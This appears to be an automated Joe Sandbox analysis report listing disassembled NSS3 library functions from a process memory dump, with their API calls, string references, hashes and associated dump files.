
API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: e0d36cafa26dd5daa7727b26a13e81b54827bc586e62bd08970fe1170c6eb720
Instruction ID: 745a30ae80f9f89066c4dbd927431155b70f8440f25aa6e270fef106da6d0c8a
Opcode Fuzzy Hash: e0d36cafa26dd5daa7727b26a13e81b54827bc586e62bd08970fe1170c6eb720
Instruction Fuzzy Hash: C9311471A04221AFC714CF28DC80B5AB7F4EF49348F168429E918DB652E732E911CBE1

Function 6D50AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D50AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6D629500,6D503F91), ref: 6D50AFD2

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

DER_GetInteger_Util.NSS3(?), ref: 6D50B007

Part of subcall function 6D556A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6D501666,?,6D50B00C,?), ref: 6D556AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6D50B02F
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D50B046
PL_FreeArenaPool.NSS3 ref: 6D50B058
PL_FinishArenaPool.NSS3 ref: 6D50B060

Strings

security, xrefs: 6D50AFB8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: da05d66b091f48443d861ffaca858c0d7a550856684ceedaa7a350be14e10be0
Instruction ID: 3d7ee3a2df9f41fab3a674a203a0935477f36002a272ce945ab80ce656be2515
Opcode Fuzzy Hash: da05d66b091f48443d861ffaca858c0d7a550856684ceedaa7a350be14e10be0
Instruction Fuzzy Hash: E13147704083409BDB24DF24DC84B7A77A8AF8A76DF008B19F9B46B6D1E3329505CB93

Function 6D54CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6D54CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6D54CE16
PR_SetError.NSS3(00000000,00000000), ref: 6D54D079

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 59db03babfb920a469684935ad85520c5f6e3381f1b48e1b0505bce54d9c3623
Instruction ID: fc21347d0f6faa370864ff119fcf95d6cc8599e1d71424d87096c2994f276fe8
Opcode Fuzzy Hash: 59db03babfb920a469684935ad85520c5f6e3381f1b48e1b0505bce54d9c3623
Instruction Fuzzy Hash: 6CC1A2B19002199BDB15CF24CC80BEAB7F4BF88308F0585A9E94C97641E775EE95CF92

Function 6D53DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6D5497C1,?,00000000,00000000,?,?,?,00000000,?,6D527F4A,00000000), ref: 6D53DC68

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D53DFAA

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 2dd7051ce0013eb9c11dd3cb7f10cb4ef79e822a2d7118d9d729b393e54ab125
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 8A81B2756045268BFB1D8A19C8903797BB6EBE0381F128C3BD519CAAE1F77CC894D712

Function 6D513C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6D513C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6D513C94

Part of subcall function 6D5095B0: TlsGetValue.KERNEL32(00000000,?,6D5200D2,00000000), ref: 6D5095D2
Part of subcall function 6D5095B0: EnterCriticalSection.KERNEL32(?,?,?,6D5200D2,00000000), ref: 6D5095E7
Part of subcall function 6D5095B0: PR_Unlock.NSS3(?,?,?,?,6D5200D2,00000000), ref: 6D509605

PORT_NewArena_Util.NSS3(00000800), ref: 6D513CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6D513CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6D513CE1

Part of subcall function 6D513090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6D52AE42), ref: 6D5130AA
Part of subcall function 6D513090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D5130C7
Part of subcall function 6D513090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6D5130E5
Part of subcall function 6D513090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D513116
Part of subcall function 6D513090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D51312B
Part of subcall function 6D513090: PK11_DestroyObject.NSS3(?,?), ref: 6D513154
Part of subcall function 6D513090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51317E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: cc6ab364dda621bdb0f5f12bfd7651c9d668076cd7061be5095c24000d2d2746
Instruction ID: 6498912bd5e69b58c2e2173cc7cb64afc36d9df9577556b330ae907deac17812
Opcode Fuzzy Hash: cc6ab364dda621bdb0f5f12bfd7651c9d668076cd7061be5095c24000d2d2746
Instruction Fuzzy Hash: 5461E5B1A08301ABFF189F65DC51F777AA9BF44748F098528EE0999952F721DC10C7B1

Function 6D553D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6D553440: PK11_GetAllTokens.NSS3 ref: 6D553481
Part of subcall function 6D553440: PR_SetError.NSS3(00000000,00000000), ref: 6D5534A3
Part of subcall function 6D553440: TlsGetValue.KERNEL32 ref: 6D55352E
Part of subcall function 6D553440: EnterCriticalSection.KERNEL32(?), ref: 6D553542
Part of subcall function 6D553440: PR_Unlock.NSS3(?), ref: 6D55355B

TlsGetValue.KERNEL32 ref: 6D553D8B
EnterCriticalSection.KERNEL32(?), ref: 6D553D9F
PR_Unlock.NSS3(?), ref: 6D553DCA
PR_SetError.NSS3(00000000,00000000), ref: 6D553DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6D553E4F

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

TlsGetValue.KERNEL32 ref: 6D553E97
EnterCriticalSection.KERNEL32(?), ref: 6D553EAB
PR_Unlock.NSS3(?), ref: 6D553ED6
PR_SetError.NSS3(00000000,00000000), ref: 6D553EEE

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 22748f8a1f54aebf5a6a25e6bd6748821e8433f2c0bc54574cd6de10b659cb79
Instruction ID: a16235e891fcec3ae6e689b4efe18739041cb488201e385e0c0027d7458ea03a
Opcode Fuzzy Hash: 22748f8a1f54aebf5a6a25e6bd6748821e8433f2c0bc54574cd6de10b659cb79
Instruction Fuzzy Hash: B95104769042029BEB169F69DC45B7A73B4AF85314F06492ADD0D47A21EB31E870C7D2

Function 6D502C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(93857CC8), ref: 6D502C5D

Part of subcall function 6D560D30: calloc.MOZGLUE ref: 6D560D50
Part of subcall function 6D560D30: TlsGetValue.KERNEL32 ref: 6D560D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6D502C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D502CE0

Part of subcall function 6D502E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6D502CDA,?,00000000), ref: 6D502E1E
Part of subcall function 6D502E00: SECITEM_DupItem_Util.NSS3(?), ref: 6D502E33
Part of subcall function 6D502E00: TlsGetValue.KERNEL32 ref: 6D502E4E
Part of subcall function 6D502E00: EnterCriticalSection.KERNEL32(?), ref: 6D502E5E
Part of subcall function 6D502E00: PL_HashTableLookup.NSS3(?), ref: 6D502E71
Part of subcall function 6D502E00: PL_HashTableRemove.NSS3(?), ref: 6D502E84
Part of subcall function 6D502E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6D502E96
Part of subcall function 6D502E00: PR_Unlock.NSS3 ref: 6D502EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D502D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6D502D30
CERT_MakeCANickname.NSS3(00000001), ref: 6D502D3F
free.MOZGLUE(00000000), ref: 6D502D73
CERT_DestroyCertificate.NSS3(?), ref: 6D502DB8
free.MOZGLUE ref: 6D502DC8

Part of subcall function 6D503E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D503EC2
Part of subcall function 6D503E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D503ED6
Part of subcall function 6D503E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D503EEE
Part of subcall function 6D503E60: PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D503F02
Part of subcall function 6D503E60: PL_FreeArenaPool.NSS3 ref: 6D503F14
Part of subcall function 6D503E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D503F27

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: beb88c881f101f3d4a6674edf3d7b1e6fdaa306f8352eff2d01601e853eca4a7
Instruction ID: f27ca4285e832725a03373b09a68ca32ccedebb53c2231a99f5f1c677440f249
Opcode Fuzzy Hash: beb88c881f101f3d4a6674edf3d7b1e6fdaa306f8352eff2d01601e853eca4a7
Instruction Fuzzy Hash: 5A51C072A082129BEB29DF65DC81B2B77E5EF84344F05082DED5983651E731EC16CBD2

Function 6D508980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6D507310), ref: 6D5089B8

Part of subcall function 6D561200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D5088A4,00000000,00000000), ref: 6D561228
Part of subcall function 6D561200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6D561238
Part of subcall function 6D561200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6D5088A4,00000000,00000000), ref: 6D56124B
Part of subcall function 6D561200: PR_CallOnce.NSS3(6D662AA4,6D5612D0,00000000,00000000,00000000,?,6D5088A4,00000000,00000000), ref: 6D56125D
Part of subcall function 6D561200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6D56126F
Part of subcall function 6D561200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6D561280
Part of subcall function 6D561200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6D56128E
Part of subcall function 6D561200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6D56129A
Part of subcall function 6D561200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6D5612A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6D507310), ref: 6D5089E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6D508A00
CERT_CopyRDN.NSS3(00000004,00000000,6D507310,?,?,00000004,?), ref: 6D508A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6D508A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6D507310), ref: 6D508AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6D507310), ref: 6D508AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6D507310), ref: 6D508B1D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: 4c11dcc68cd693b70d18a0c5cc1f99b0011c2aec732157c2784140bebaeee948
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: A351F7B1604211AFE715AF14CC40F3A7BA4FF82768F05C558ED159BB91E771E805CBA2

Function 6D507CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D5040D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6D503F7F,?,00000055,?,?,6D501666,?,?), ref: 6D5040D9
Part of subcall function 6D5040D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6D501666,?,?), ref: 6D5040FC
Part of subcall function 6D5040D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6D501666,?,?), ref: 6D504138

PR_GetCurrentThread.NSS3 ref: 6D507CFD

Part of subcall function 6D5C9BF0: TlsGetValue.KERNEL32(?,?,?,6D610A75), ref: 6D5C9C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6D629030), ref: 6D507D1B

Part of subcall function 6D55FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6D501A3E,00000048,00000054), ref: 6D55FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6D629048), ref: 6D507D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6D507D50
PR_GetCurrentThread.NSS3 ref: 6D507D61
PORT_ArenaMark_Util.NSS3(?), ref: 6D507D7D
free.MOZGLUE(?), ref: 6D507D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6D507DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6D507E19

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 6f80e893eec4b4ec61456af80a691a9d4a2982b6f5e5cc4f7afa13a6fbfa2c1e
Instruction ID: 1deaa6d33bad714d48c303b3cb4e5eeac45448c8fdac03626cfec549fb24eed6
Opcode Fuzzy Hash: 6f80e893eec4b4ec61456af80a691a9d4a2982b6f5e5cc4f7afa13a6fbfa2c1e
Instruction Fuzzy Hash: C6412577E0411A9BDF08CE699C41BBF33A4AF90358F060425ED19AB651E730ED19CBE1

Function 6D4A7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D4A7E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D4A7E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6D4A7EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4A7F2E

Strings

database corruption, xrefs: 6D4A7EE2, 6D4A7F23
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4A7ED8, 6D4A7F08, 6D4A7F19
%s at line %d of [%.10s], xrefs: 6D4A7EE7, 6D4A7F28

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 9fd4f74f4c5e6b7d47981b33056f4d28e19b17d11c26dd04686560f748eee169
Instruction ID: d0b090a209ff317b08d5e1a028e3e72a4b91eecafe6fc07cd001e1431c584d12
Opcode Fuzzy Hash: 9fd4f74f4c5e6b7d47981b33056f4d28e19b17d11c26dd04686560f748eee169
Instruction Fuzzy Hash: 32619170A082069FDB15CF28C890F6A3766BF59304F1984A8ED095B35AD731EC52CBE1

Function 6D48FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D48FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D48FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D48FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D48FE83

Part of subcall function 6D48FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6D48FEFA
Part of subcall function 6D48FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6D48FF3B

Strings

database corruption, xrefs: 6D48FD6E, 6D48FE30
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D48FD64, 6D48FE26
%s at line %d of [%.10s], xrefs: 6D48FD73, 6D48FE35

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: d348065151ea59bc1f2037d9d1efcd372e65f7b1d1fe98ed1dda09516ac2eaa4
Instruction ID: 5271a1bddf3f411048f328aea6b92dee4adcf2d9e819ab3e5b05f5bdd917e633
Opcode Fuzzy Hash: d348065151ea59bc1f2037d9d1efcd372e65f7b1d1fe98ed1dda09516ac2eaa4
Instruction Fuzzy Hash: A6515971A052059FDB04CFA9C890EBAB7F5BF48344F154069EA06AB353E735EC91CBA1

Function 6D5D2F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D5D2FFD
sqlite3_initialize.NSS3 ref: 6D5D3007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D5D3032
sqlite3_mprintf.NSS3(6D63AAF9,?), ref: 6D5D3073
sqlite3_free.NSS3(?), ref: 6D5D30B3
